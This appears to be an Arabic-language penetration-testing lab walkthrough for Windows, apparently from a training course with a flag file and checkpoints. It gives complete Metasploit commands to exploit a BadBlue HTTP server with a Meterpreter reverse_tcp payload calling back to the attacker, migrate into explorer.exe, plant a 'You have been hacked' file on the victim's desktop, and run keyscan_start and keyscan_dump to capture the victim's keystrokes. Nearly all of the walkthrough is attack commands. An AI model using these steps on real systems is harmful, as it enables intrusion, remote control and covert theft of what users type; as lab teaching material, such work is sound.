🧪 المختبر العملي 24: تسجيل الملفات وضغطات المفاتيح في Windows (Windows – File and Keylogging Lab

🎯 الهدف الأساسي: إنشاء ملف على سطح مكتب النظام المستهدف، وكتابة نص فيه، ثم تشغيل مسجل ضغطات المفاتيح (Keylogger) لتسجيل نشاط لوحة المفاتيح للمستخدم، وذلك بعد الحصول على جلسة Meterpreter.

🔧 الأدوات المستخدمة:

• MSFconsole: واجهة Metasploit الرئيسية.

• Exploit Module: أي وحدة استغلال تمنح جلسة Meterpreter (مثلاً: windows/http/badblue_passthru).

• Meterpreter Payload: للحصول على تحكم كامل.

• Meterpreter Commands: shell, echo, type, keyscan_start, keyscan_dump.

📜 خطوات التنفيذ:

📊 مرحلة الاستغلال (Exploitation)

1. 🚀 بدء تشغيل MSFconsole والحصول على جلسة Meterpreter:

   • ابدأ msfconsole:

     msfconsole -q

   • حدد عنوان IP للهدف.

   • 🔑 استخدام وحدة استغلال للحصول على Meterpreter (مثلاً Badblue HTTP Server):

     use exploit/windows/http/badblue_passthru
     set RHOSTS [Target_IP_Address]
     set LHOST [Your_Kali_IP_Address]
     set LPORT 4444
     set PAYLOAD windows/meterpreter/reverse_tcp
     exploit

   • إذا نفذت هذه الأوامر بنجاح، ستفتح جلسة Meterpreter session 1 opened.

2. 🔧 ترحيل عملية Meterpreter (Process Migration) (موصى به):

   • لماذا؟: لزيادة ثبات الجلسة والتعامل مع ملفات القرص، يتم نقل جلسة Meterpreter إلى عملية نظامية مستقرة مثل explorer.exe.

   • الحصول على قائمة العمليات:

     ps

   • ابحث عن explorer.exe وحدد رقم المعرف الخاص بالعملية (PID) (مثلاً: 2640).

   • ترحيل العملية:

     migrate [PID_of_explorer.exe]

   • إذا نفذت هذا الأمر، ستنتقل جلسة Meterpreter بنجاح.

📊 مرحلة ما بعد الاستغلال: إدارة الملفات وتسجيل ضغطات المفاتيح

1. 💡 قراءة ملف الفلاج (إن وجد):

   • ادخل إلى صدفة الأوامر:

     shell

   • للانتقال إلى جذر القرص C: وقراءة ملف الفلاج:

     cd C:\
     type flag.txt

   • ستُعرض لك محتويات ملف الفلاج.

2. 💡 إنشاء ملف على سطح المكتب وكتابة نص فيه:

   • في صدفة الأوامر:

     cd C:\Users\Public\Desktop # أو مسار سطح المكتب للمستخدم النشط
     echo "You have been hacked" > hacked.txt

   • إذا نفذت هذا الأمر، سيتم إنشاء ملف hacked.txt على سطح المكتب يحتوي على النص المحدد.

   • ✅ التحقق: انتقل إلى جهاز الضحية (إذا كان لديك وصول رسومي) أو استخدم أمر type hacked.txt في الصدفة للتحقق من وجود الملف ومحتواه.

3. 💡 فتح الملف الذي تم إنشاؤه من جهاز المهاجم:

   • في صدفة الأوامر:

     hacked.txt

   • إذا نفذت هذا الأمر، سيتم فتح الملف على جهاز الضحية.

4. 💡 تشغيل مسجل ضغطات المفاتيح (Keylogger):

   • اخرج من صدفة الأوامر:

     exit

   • بدء مسجل ضغطات المفاتيح:

     keyscan_start

   • إذا نفذت هذا الأمر، سيبدأ مسجل ضغطات المفاتيح في تسجيل جميع ضغطات المفاتيح على جهاز الضحية.

   • ✅ التحقق: اطلب من مستخدم الضحية (إذا كان متاحًا) كتابة نص ما (مثلاً "Ahmed Sultan 2").

   • استخراج ضغطات المفاتيح المسجلة:

     keyscan_dump

   • إذا نفذت هذا الأمر، ستُعرض لك جميع ضغطات المفاتيح التي تم تسجيلها.

✅ نقاط التحقق:

• يجب الحصول على جلسة Meterpreter.

• يجب إنشاء ملف hacked.txt على سطح مكتب الضحية بنجاح.

• يجب تشغيل مسجل ضغطات المفاتيح بنجاح.

• يجب أن تكون قادرًا على استخراج ضغطات المفاتيح المسجلة.